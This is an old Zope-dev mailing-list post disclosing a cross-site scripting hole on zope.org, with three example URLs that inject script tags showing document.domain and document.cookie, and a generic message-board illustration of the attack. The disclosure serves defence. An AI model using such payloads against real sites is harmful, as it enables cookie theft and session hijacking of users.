[Zope-dev] New: Cross Site Scripting vulnerability

ALife ALife" <buginfo@inbox.ru
Sun, 23 Sep 2001 17:23:32 +0000 (GMT)


Example:

http://www.zope.org/Documentation/<SCRIPT>alert(document.domain)</SCRIPT>
http://www.zope.org/lalalalal<SCRIPT>alert(document.domain)</SCRIPT>
http://www.zope.org/<SCRIPT>alert(document.cookie)</SCRIPT>

For  example, an attacker might post a message like

        Hello message board. This is a message.
               <SCRIPT>malicious code</SCRIPT>
        This is the end of my message.

    When a victim with scripts enabled  in their  browser reads this
message,  the  malicious  code   may  be  executed   unexpectedly.
    Scripting tags that can be embedded in this way include <SCRIPT>,
<OBJECT>, <APPLET>, and <EMBED>.